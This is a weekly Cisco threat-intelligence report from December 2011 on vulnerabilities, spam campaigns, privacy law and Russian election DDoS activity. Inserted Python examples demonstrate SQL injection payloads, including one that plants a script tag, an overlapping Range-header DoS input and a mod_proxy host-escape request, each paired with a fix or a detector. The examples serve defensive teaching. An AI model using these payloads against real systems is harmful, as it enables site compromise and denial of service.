Cyber Risk Report

December 5–11, 2011

The Cyber Risk Report is a strategic intelligence product that highlights current security activity and mid- to long-range perspectives. The report addresses seven major risk management categories: vulnerability, physical, legal, trust, identity, human, and geopolitical. Cyber Risk Reports are powered by Cisco Security Intelligence Operations, an advanced security infrastructure that identifies, analyzes, and defends against threats to keep organizations informed and protected. Cyber Risk Reports are the collaborative efforts of Cisco security analysts from the following teams: IntelliShield, Applied Intelligence, Remote Management Services, Intrusion Prevention System Signature Development, Cisco Product Security Incident Response, Cisco Malware Research, Strategic Technology Assessment Team, Infrastructure Security Research & Development, IronPort Email and Web Threat Research, Critical Infrastructure Assurance Group, Advanced Services, Security Sales and Engineering, Corporate Security Programs, Government Affairs, and Legal Support.

Vulnerability

Vulnerability and threat activity returned to higher levels for this period. Highlights include multiple Red Hat updates for new and previously reported vulnerabilities, new vulnerabilities in Adobe Acrobat and Reader and in Adobe Flash Player, an Apple QuickTime vulnerability, and a vulnerability in Yahoo! Messenger. A Facebook authentication bypass vulnerability was reported and demonstrated; it allowed an attacker to access photos in another user's Facebook account. Facebook has corrected the vulnerability.

Adobe products remain squarely in the focus of attackers. Two new vulnerabilities with available mitigations were reported, but Adobe will not have security updates available until mid-January. These vulnerabilities are covered in IntelliShield Alert 24698. Their announcement coincided with new spam traffic posing as an Adobe security update announcement, reported in IntelliShield Alert 24680. The spam adds risk for users who are looking for information and updates on the legitimately reported vulnerabilities: an "update" arriving by e-mail should be treated as malicious, and patches should be obtained only from Adobe's own site.

Threat activity remains elevated, with reports of a mass SQL injection attack affecting more than 4,000 websites; the Carberp trojan and the Blackhole exploit kit continue to infect users through drive-by attacks hosted on compromised websites.
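As an added illustration (not code from the report or from any of the sites involved), here is the flaw class that mass SQL injection campaigns exploit: a query built by string concatenation beside its parameterized form. The table, rows, the host in the injected script tag and the payloads are constructed for the demo; a stacked-query UPDATE stands in for the way one malicious request can rewrite every row of a site's content table.

```python
"""Added example, not code from the Cisco report: the string-built query
pattern behind mass SQL injection campaigns, beside its parameterized fix.
The table, rows and payloads are constructed for the demo."""
import sqlite3

ROWS = [("alice", "Welcome to our store"), ("bob", "Holiday shipping deals")]
# Assumed attacker payload; the host is a placeholder, not a real site.
INJECTED_TAG = '<script src="//example.invalid/s.js"></script>'


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (owner TEXT, body TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?)", ROWS)
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, owner: str) -> list:
    # The request parameter is spliced into the SQL text, so a quote in the
    # input closes the literal and everything after it is parsed as SQL.
    sql = "SELECT owner, body FROM pages WHERE owner = '" + owner + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, owner: str) -> list:
    # Bound parameter: the value travels separately from the SQL text and can
    # only ever be compared as data, whatever characters it contains.
    return conn.execute(
        "SELECT owner, body FROM pages WHERE owner = ?", (owner,)
    ).fetchall()


def touch_vulnerable(conn: sqlite3.Connection, owner: str) -> list:
    # Same splice in a write path. executescript() accepts several statements
    # at once, standing in for database drivers that allow stacked queries,
    # which is what lets one injected request rewrite every row in a table.
    sql = "UPDATE pages SET body = body WHERE owner = '" + owner + "'"
    conn.executescript(sql)
    return [row[0] for row in conn.execute("SELECT body FROM pages ORDER BY owner")]


def touch_safe(conn: sqlite3.Connection, owner: str) -> list:
    # With a bound parameter there is no way to terminate the statement.
    conn.execute("UPDATE pages SET body = body WHERE owner = ?", (owner,))
    return [row[0] for row in conn.execute("SELECT body FROM pages ORDER BY owner")]


def tautology_payload() -> str:
    # Turns WHERE owner = '...' into a condition that is true for every row.
    return "nobody' OR '1'='1"


def stacked_payload() -> str:
    # Closes the first statement and appends a second one that edits every row.
    return "nobody'; UPDATE pages SET body = body || '" + INJECTED_TAG + "' WHERE '1'='1"


if __name__ == "__main__":
    db = make_db()
    print(len(lookup_vulnerable(db, tautology_payload())), "rows leaked")
    print(len(lookup_safe(db, tautology_payload())), "rows with a bound parameter")
    print(touch_vulnerable(db, stacked_payload())[0])
```

The same two payloads are harmless against the parameterized functions: the tautology matches no owner, and the stacked statement is never parsed as SQL. Whether a given platform allows stacked queries varies by driver, but the fix (bind every user-controlled value) is the same everywhere.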

During this holiday period of increased online activity, the Cisco IronPort Threat Operations Center continues to report high levels of spam and malicious e-mail. The corresponding IntelliShield Threat Outbreak Alerts are available on the Cisco Security Intelligence Operations website. While numerous security organizations are providing tips for safe online activity during the holidays, few have mentioned the long-running spam campaigns that pose as shipping notifications and electronic bills. Users who shop and ship online should expect these messages and not act on them: go directly to the retailer's or carrier's website to track deliveries or investigate billing issues rather than following links or opening attachments in the e-mail.

This is also the time of year for operations and security managers to review escalation procedures with their teams so that operations run smoothly over the upcoming holidays, when many workers will be away and remaining staffing will likely be minimal. Specific instructions for this period let the working staff continue to operate without unnecessary or misdirected escalations, attempts to contact individuals on holiday, or delays in responding to incidents and events.

The Microsoft Security Bulletin Advance Notification for December 2011, posted December 8, 2011, included 14 bulletins to address 20 vulnerabilities that will be released December 13, 2011. The vulnerabilities impact Windows, Internet Explorer, Office, and Media Player, with three bulletins rated as Critical and the others as Important. Cisco Security Intelligence Operations will provide an Event Response for the Microsoft December Security Update, including IntelliShield alerts, an Applied Mitigation Bulletin, and IPS signature updates.

On an administrative note to our readers, the Cyber Risk Report will not be published on January 3, 2012, because of the holidays and reduced work schedules.

IntelliShield published 106 events last week: 56 new events and 50 updated events. Of the 106 events, 60 were Vulnerability Alerts, three were Security Activity Bulletins, eight were Security Issue Alerts, 34 were Threat Outbreak Alerts, and one was a Cyber Risk Report. The alert publication totals are as follows:

Weekly Alert Totals

Day           Date        New  Updated  Total
Friday        12/09/2011   14        8     22
Thursday      12/08/2011   13        5     18
Wednesday     12/07/2011   21       24     45
Tuesday       12/06/2011    1        9     10
Monday        12/05/2011    7        4     11
Weekly Total               56       50    106


Significant Alerts for the Time Period

Adobe Acrobat and Reader Universal 3D Remote Code Execution Vulnerability
IntelliShield Vulnerability Alert 24698, Version 1, December 7, 2011
Urgency/Credibility/Severity Rating: 2/5/4
CVE-2011-2462
Adobe Reader and Acrobat contain a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary code on a targeted system. Targeted attacks against Adobe Reader version 9.4.6 on Microsoft Windows operating systems have been observed in the wild.

Previous Alerts That Still Represent Significant Risk

Oracle Java Applet Rhino Script Engine Arbitrary Code Execution Vulnerability
IntelliShield Vulnerability Alert 24470, Version 4, December 1, 2011
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2011-3544
Multiple versions of Oracle Java contain a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary code on a targeted system. Oracle and multiple other vendors have confirmed this vulnerability and released updated software. Functional code that demonstrates an exploit is publicly available.

Apache HTTP Server Reverse Proxy Rewrite URL Validation Vulnerability
IntelliShield Vulnerability Alert 24625, Version 1, November 28, 2011
Urgency/Credibility/Severity Rating: 2/5/3
CVE-2011-4317
Apache HTTP Server contains a vulnerability that could allow an unauthenticated, remote attacker to gain unauthorized access to internal networks. Apache has not confirmed the vulnerability, and software updates are not available. The vulnerability is a regression: the fix for CVE-2011-3368, documented in IntelliShield Alert 24327, is incomplete. Proof-of-concept code that exploits the vulnerability is publicly available.

ISC BIND Recursive Query Processing Denial of Service Vulnerability
IntelliShield Vulnerability Alert 24590, Version 8, December 2, 2011
Urgency/Credibility/Severity Rating: 2/5/3
CVE-2011-4313
ISC BIND version 9 contains a vulnerability that could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on a targeted system. External reports indicate that the vulnerability is being actively exploited in the wild, and DNS server crashes have been observed; however, it has not been fully determined that exploitation of this vulnerability is the root cause of those crashes. ISC and multiple vendors have confirmed this vulnerability and released updated software.

Apache HTTP Server Overlapping Ranges Denial of Service Vulnerability
IntelliShield Vulnerability Alert 24004, Version 18, November 15, 2011
Urgency/Credibility/Severity Rating: 2/5/3
CVE-2011-3192
Apache HTTP Server contains a vulnerability that could allow an unauthenticated, remote attacker to cause a DoS condition. Proof-of-concept code that exploits this vulnerability is publicly available. Apache has confirmed this vulnerability and updated software is available. Oracle and multiple additional vendors have released security advisories. HP has released an additional security bulletin.
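The overlapping-ranges flaw is straightforward to screen for at the edge. The following is an added example, not code from the report or from the Apache project: it parses a Range header, flags range sets that are too numerous or overlap, and shows the coalescing that the fixed httpd versions perform. The five-range limit mirrors the SetEnvIf workaround published in the Apache advisory; the sample headers, resource size and decision labels are constructed assumptions.

```python
"""Added example, not code from the Cisco report or from the Apache project:
a server-side check for the Range header pattern behind the CVE-2011-3192
denial of service. The limit of five ranges mirrors the SetEnvIf workaround
in the Apache advisory; the sample headers below are constructed."""
import re
from typing import List, Optional, Tuple

MAX_RANGES = 5
_SPEC = re.compile(r"^(\d*)-(\d*)$")
Range = Tuple[int, int]


def parse_byte_ranges(header: str, length: int) -> Optional[List[Range]]:
    """Resolve a 'bytes=' range set against a resource of `length` bytes.

    Returns absolute (first, last) pairs; unsatisfiable specs are dropped.
    Returns None when the set is malformed, in which case RFC 2616 says to
    ignore the header and serve the whole resource.
    """
    header = header.strip()
    if not header.lower().startswith("bytes="):
        return None
    ranges: List[Range] = []
    for spec in header[len("bytes="):].split(","):
        m = _SPEC.match(spec.strip())
        if not m or (m.group(1) == "" and m.group(2) == ""):
            return None
        first, last = m.group(1), m.group(2)
        if first == "":                       # suffix form: the last N bytes
            n = int(last)
            if n == 0:
                continue                      # asks for nothing: unsatisfiable
            ranges.append((max(0, length - n), length - 1))
            continue
        first_i = int(first)
        if first_i >= length:
            continue                          # starts past the end: unsatisfiable
        last_i = int(last) if last else length - 1
        if last_i < first_i:
            return None                       # e.g. "bytes=500-100" is malformed
        ranges.append((first_i, min(last_i, length - 1)))
    return ranges


def has_overlap(ranges: List[Range]) -> bool:
    """True if any two ranges share a byte: the attack relies on this."""
    prev_last = -1
    for first, last in sorted(ranges):
        if first <= prev_last:
            return True
        prev_last = max(prev_last, last)
    return False


def merge_ranges(ranges: List[Range]) -> List[Range]:
    """Coalesce overlapping or adjacent ranges, as the fixed httpd versions
    do, so one request can no longer buffer the same bytes hundreds of times."""
    merged: List[Range] = []
    for first, last in sorted(ranges):
        if merged and first <= merged[-1][1] + 1:
            merged[-1] = (merged[-1][0], max(merged[-1][1], last))
        else:
            merged.append((first, last))
    return merged


def amplification(ranges: List[Range], length: int) -> float:
    """Bytes the ranges ask for, as a multiple of the resource size."""
    return sum(last - first + 1 for first, last in ranges) / length


def classify(header: str, length: int, max_ranges: int = MAX_RANGES) -> str:
    """'serve-full' (malformed: ignore header, 200), 'unsatisfiable' (416),
    'abusive' (too many or overlapping ranges: drop the header, answer 200,
    as the SetEnvIf workaround does) or 'serve-partial' (206)."""
    ranges = parse_byte_ranges(header, length)
    if ranges is None:
        return "serve-full"
    if not ranges:
        return "unsatisfiable"
    if len(ranges) > max_ranges or has_overlap(ranges):
        return "abusive"
    return "serve-partial"


if __name__ == "__main__":
    # Constructed attack header: hundreds of ranges that all overlap.
    attack = "bytes=" + ",".join(f"{i}-" for i in range(300))
    print(classify("bytes=0-99,200-299", 1000))
    print(classify(attack, 1000), round(amplification(parse_byte_ranges(attack, 1000), 1000)))
```

Counting ranges alone (the workaround) rejects the published attack traffic; the overlap test catches a smaller set of ranges that still asks the server to buffer the same bytes repeatedly, and the amplification ratio is a useful field to log when tuning the threshold.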

Adobe Flash Player and AIR Multiple Vulnerabilities
IntelliShield Vulnerability Alert 24582, Version 2, November 14, 2011
Urgency/Credibility/Severity Rating: 2/5/4
CVE-2011-2445, CVE-2011-2450, CVE-2011-2451, CVE-2011-2452, CVE-2011-2453, CVE-2011-2454, CVE-2011-2455, CVE-2011-2456, CVE-2011-2457, CVE-2011-2458, CVE-2011-2459, CVE-2011-2460
Adobe Flash Player and AIR contain multiple vulnerabilities that could allow an unauthenticated, remote attacker to execute arbitrary code or cause a DoS condition on a targeted system. Adobe, Red Hat, and FreeBSD have released security advisories and updates.

Microsoft Windows UDP Packet Processing Integer Overflow Arbitrary Code Execution Vulnerability
IntelliShield Vulnerability Alert 24490, Version 2, November 14, 2011
Urgency/Credibility/Severity Rating: 2/5/4
CVE-2011-2013
Microsoft Windows contains a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary code on a targeted system. Proof-of-concept code that demonstrates an exploit of this vulnerability is publicly available. Microsoft has released a security bulletin and updates.

Trojan: W32.Duqu
IntelliShield Vulnerability Alert 24425, Version 3, November 2, 2011
Urgency/Credibility/Severity Rating: 3/5/3
W32.Duqu is a remote access trojan that attempts to steal sensitive information, initiate remote application download, and provide backdoor access to a remote attacker. Virus definitions are available. IntelliShield has updated this alert to include information about a vulnerability in the Microsoft Windows platform that the W32.Duqu trojan could leverage to infect a targeted system. ICS-CERT and multiple antivirus vendors have also released security alerts with virus descriptions for this trojan.

Microsoft Windows TrueType Font Parsing Remote Code Execution Vulnerability
IntelliShield Vulnerability Alert 24500, Version 2, November 4, 2011
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2011-3402
Microsoft has released a security advisory announcing that it is investigating the TrueType font parsing remote code execution vulnerability, along with a Fix-It solution as a workaround. Reports suggest that this vulnerability is being exploited by W32.Duqu to install itself on a targeted system; the trojan is documented in IntelliShield Alert 24425.

Oracle Java SE Critical Patch Update October 2011
IntelliShield Vulnerability Alert 24433, Version 5, November 28, 2011
Urgency/Credibility/Severity Rating: 2/5/4
CVE-2011-3389, CVE-2011-3516, CVE-2011-3521, CVE-2011-3544, CVE-2011-3545, CVE-2011-3546, CVE-2011-3547, CVE-2011-3548, CVE-2011-3549, CVE-2011-3550, CVE-2011-3551, CVE-2011-3552, CVE-2011-3553, CVE-2011-3554, CVE-2011-3555, CVE-2011-3556, CVE-2011-3557, CVE-2011-3558, CVE-2011-3560, CVE-2011-3561
Oracle has released the Oracle Java SE Critical Patch Update for October 2011. The update addresses 20 new security vulnerabilities. An unauthenticated, remote attacker could leverage several of the vulnerabilities to completely compromise an affected system. Oracle, Red Hat, CentOS, and Apple have released updates.

Worm Targeting Vulnerable JBoss Application Server Installations
IntelliShield Vulnerability Alert 24445, Version 1, October 21, 2011
Urgency/Credibility/Severity Rating: 3/5/3
Multiple reports indicate a worm circulating in the wild is exploiting a patched vulnerability in JBoss Application Server, reported in IntelliShield Alert 20397. Updates and instructions to mitigate the threat are available. This vulnerability was originally reported in April 2010.

Apache HTTP Server mod_proxy Module Information Disclosure Vulnerability
IntelliShield Vulnerability Alert 24327, Version 6, November 15, 2011
Urgency/Credibility/Severity Rating: 2/5/3
CVE-2011-3368
Apache HTTP Server contains a vulnerability that could allow an unauthenticated, remote attacker to gain access to sensitive information. Proof-of-concept code that demonstrates an exploit of this vulnerability is publicly available. Apache, Red Hat, IBM, and FreeBSD have released security advisories and software updates.
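Both Apache mod_proxy entries above (Alerts 24327 and 24625) stem from the same rule shape: a RewriteRule with the [P] flag, or a ProxyPassMatch, whose pattern can match a request-URI that does not begin with "/" and whose substitution glues the captured text directly onto the backend host name. The following added Python example, not code from the report or from the Apache project, reproduces the rewrite on a constructed request line and parses the result to show that the backend name becomes URL userinfo while the attacker-supplied host becomes the destination; it then lints directive strings for that shape. Host names, rules and request lines are assumptions.

```python
"""Added example, not code from the Cisco report or from the Apache project:
why the mod_proxy rewrite flaws tracked as CVE-2011-3368 and CVE-2011-4317
let a request escape to an internal host, and a lint for the rule shape that
enables it. Host names, rules and request lines are constructed."""
import re
from typing import Optional, Tuple
from urllib.parse import urlsplit

_BACKREF = re.compile(r"\$(\d)")
# scheme://host immediately followed by a backreference, with no "/" between.
_HOST_THEN_BACKREF = re.compile(r"^[a-z][a-z0-9+.-]*://[^/]*\$\d", re.I)


def rewrite_target(pattern: str, substitution: str, request_uri: str) -> Optional[str]:
    """Apply an Apache-style pattern/substitution (with $N backreferences) to
    a request-URI the way RewriteRule ... [P] or ProxyPassMatch would, and
    return the URL that would be proxied, or None if the rule does not match."""
    m = re.search(pattern, request_uri)
    if not m:
        return None
    return _BACKREF.sub(lambda ref: m.group(int(ref.group(1))), substitution)


def proxy_destination(url: str) -> Tuple[Optional[str], int]:
    """Host and port a proxy would actually connect to for `url`. Anything
    before '@' in the authority is userinfo, not the host."""
    parts = urlsplit(url)
    port = parts.port or (443 if parts.scheme == "https" else 80)
    return parts.hostname, port


def rule_is_unsafe(directive: str) -> bool:
    """Flag a RewriteRule/ProxyPassMatch whose pattern can match a request-URI
    that does not start with '/', or whose substitution appends the capture
    straight to the backend host. Either lets '@' or ':' in the request-URI
    change which host the resulting URL names."""
    tokens = directive.split()
    if len(tokens) < 3 or tokens[0] not in ("RewriteRule", "ProxyPassMatch"):
        return False
    pattern, substitution = tokens[1], tokens[2]
    if not pattern.startswith("^/"):
        return True
    return bool(_HOST_THEN_BACKREF.match(substitution))


if __name__ == "__main__":
    # Constructed request line "GET @intranet:8080/admin HTTP/1.0": no leading "/".
    leaked = rewrite_target(r"^(.*)", "http://backend$1", "@intranet:8080/admin")
    print(leaked, proxy_destination(leaked))
    print(rewrite_target(r"^/(.*)", "http://backend/$1", "@intranet:8080/admin"))
```

The lint is deliberately strict: a pattern anchored at "^/" with a substitution of the form "http://backend/$1" is the shape the Apache advisory recommends, and anything else is worth a manual look even when the current request parser happens to reject the odd URI.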

FreeType PostScript Type 1 Font Parsing callothersubr Arbitrary Code Execution Vulnerability
IntelliShield Vulnerability Alert 23602, Version 5, October 14, 2011
Urgency/Credibility/Severity Rating: 3/5/3
CVE-2011-0226
FreeType versions prior to 2.4.5 contain a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary code on a targeted system. Functional exploit code for this vulnerability is used publicly in conjunction with other vulnerabilities to provide web-based "jailbreak" capabilities for Apple iOS devices. Other sites or exploits may be able to repurpose this exploit code for malicious purposes. Apple, Red Hat, and FreeBSD have released updated software.

Physical

Defense Advanced Research Projects Agency's Shredder Challenge Solved Ahead of Schedule

The team All Your Shreds Are Belong to U.S., based in San Francisco, won the U.S. Defense Advanced Research Projects Agency's (DARPA) Shredder Challenge, reassembling five digitized renditions of shredded documents 2 days before the end of the event. DARPA commissioned the contest to assist with solutions for the recovery of shredded documents obtained from a war zone. The contest used digitized document fragments that had a size and resolution similar to those that could be received from U.S. troops in a combat situation. The contest winners used computer vision algorithms to suggest fragment pairings to humans, who then performed final verification.

IntelliShield Analysis: Crowdsourcing has been an attractive method for solving problems in the past, and DARPA has now had some success with it. It offers an organization a straightforward way to gather solutions: create a contest and offer an attractive reward. While the Shredder Challenge was solved early, the implications for enterprises that destroy sensitive material are currently not great, but they could grow. The samples DARPA used for the contest were individual documents, not the mix of documents that would typically be found in a shredder bin. Still, just as increased computing power has moved weaker encryption schemes into obsolescence, the same can happen to some security methods used in the physical world. Enterprises are advised to weigh the value of their data to outside parties against the cost and feasibility, to those parties, of retrieving it.

Legal

Privacy Law Update to Allow Netflix Online Customer Information Sharing

Last week, users of online rental services got one step closer to easily sharing information about the shows they watch when the U.S. House of Representatives voted to update video privacy laws. The United States has a history of strict privacy protections with regard to video rental services such as Netflix. Netflix and Facebook would be the primary beneficiaries of the change, which would let Facebook users post for their friends what they have watched on Netflix. Current law requires written consent from the consumer before rental information or video records can be shared, and because Netflix consumers are "virtual," obtaining that consent is the challenge. Furthermore, under current law the consumer would have to consent to each disclosure, that is, to each rental or item of rental information. The key change in the update is that it would allow consumers to consent via the web and to consent once for all future information sharing.

IntelliShield Analysis: As the story of information disclosure continues to twist and turn, each subsequent proposal or change to the law gives immediate cause for concern. On a 1 to 10 scale of severity, with 10 the highest, this analyst would put current concern about personal information disclosure at 6 or 7. As businesses find innovative ways to keep growing, laws and standards change to accommodate the new business models, but is this a good thing? If too many parts of the foundation change, one has to ask how much of the focus remains grounded. How much change does a consumer accept for the benefit of a business, and is it for the greater good? The proposal here is for "future consent" simply to avoid the "inconvenience" of obtaining written consent for every video rental. Times change, and with them the information age must change as well, most notably in how closely consumers analyze and scrutinize what they agree to. It is no longer acceptable to trust by proxy; such blind trust often ends in drastic consequences. In a period when identity theft and other information disclosure threats are abundant, one of the last things a consumer should allow is blind disclosure. Security practitioners understand that security and convenience are at odds; now society must learn to measure how much inconvenience is worth.

Trust

There was no significant activity in this category during the time period.

Identity

There was no significant activity in this category during the time period.

Human

There was no significant activity in this category during the time period.

Geopolitical

Russian Election Frustrations Play Out Online and Offline

The ruling United Russia party suffered a major setback in Russian parliamentary elections on December 4, returning about 50 percent of the vote, down from the two-thirds majority it has held in the Duma since 2007. Accusations of vote rigging precipitated protests involving tens of thousands, widely interpreted as a personal setback for Prime Minister Putin and a referendum on his intention to return to the presidency in March 2012. Further frustrating voters were reports that websites belonging to election observers and opposition political groups had been hit by DDoS attacks. One Russian social networking site reported that representatives of Russia's domestic security service, the FSB, had asked it to block the communications of political protesters. Online security experts, meanwhile, reported that activists' tweets appear to have been intentionally drowned out by pro-Kremlin botnets.

IntelliShield Analysis: Although most Kremlin experts say that Putin remains a shoo-in for the March 2012 presidential election, online and on-street efforts to silence political frustration may backfire on the Russian establishment. Indeed, a Financial Times commentary said that December's protests may mark the beginning of a long-term erosion in Putin's political power. Government authorities may feel that the more moderate and reform-oriented policies encouraged under President Medvedev went too far, and they appear poised to crack down on protests. The ensuing struggle between pro-Putin and antiestablishment forces may imperil the business environment and possibly encourage foreign investors to hold off on new projects in coming months. At the same time, Russian official statistics show net capital flight over the past year, possibly indicating that domestic investors are moving assets to safe havens beyond their borders. In coming months, then, technology companies operating in Russia may want to factor in the risks of increased government oversight of and involvement in media and electronic communications. Moreover, as Putin seeks a scapegoat for his current problems, Western investors may also experience a colder operating environment, at least until the political situation stabilizes after the elections next spring.

Upcoming Security Activity

Black Hat Abu Dhabi 2011: December 12–15, 2011
International Conference on Cyber Security (ICCS 2012): January 9–12, 2012
Cyber Defence & Network Security conference: January 24–27, 2012
RSA Conference: February 27–March 2, 2012
CanSecWest 2012: March 7–9, 2012

Because of the potential for increased risk on multiple vectors, organizations' security teams should be aware of and consider making special preparations for the following dates:

Al-Hijra/Muharram: November 26–December 24, 2011
Hanukkah: December 20–28, 2011
Christmas: December 25, 2011
New Year's: January 1, 2012

Additional Information

For more information about the vulnerabilities contained in this report or the Cisco Security IntelliShield Alert Manager Service, please visit the Cisco Security IntelliShield Alert Manager Service page.

For information on obtaining a free trial of the Cisco Security IntelliShield Alert Manager Service, please visit the Trial Registration page.



This document is provided on an "as is" basis and does not imply any kind of guarantee or warranty, including the warranties of merchantability or fitness for a particular use. Your use of the information on the document or materials linked from the document is at your own risk. Cisco reserves the right to change or update this document at any time.
